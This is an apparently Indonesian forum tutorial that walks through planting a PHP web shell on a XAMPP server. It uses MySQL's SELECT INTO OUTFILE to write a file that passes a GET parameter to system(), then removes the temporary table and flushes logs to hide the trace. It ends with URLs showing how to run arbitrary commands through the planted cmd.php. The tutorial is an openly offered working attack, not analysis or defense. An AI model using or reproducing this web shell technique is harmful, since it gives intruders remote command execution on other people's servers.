Langkah pertama yang kudu kita lakuin setelah Login ke database, masuk ke SQL Query. gak perlu masuk database. langsung aja masuk SQL Query.
Langkah kedua, kita copas code berikut :
Code: Select all
use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<? $cmd = $_GET["cmd"]; if (!empty($cmd)) { echo "<pre>"; system($cmd); echo "</pre>"; exit; } ?>');
SELECT * INTO OUTFILE 'C:/xampp/htdocs/cmd.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;
Code: Select all
http://sh4dhckr.com/cmd.php
Langkah ke-empat, kita eksekusi cmd lewat file tadi make perintah :
Code: Select all
http://sh4dhckr.com/cmd.php?cmd=[command-yang-mau-dieksekusi]
salam.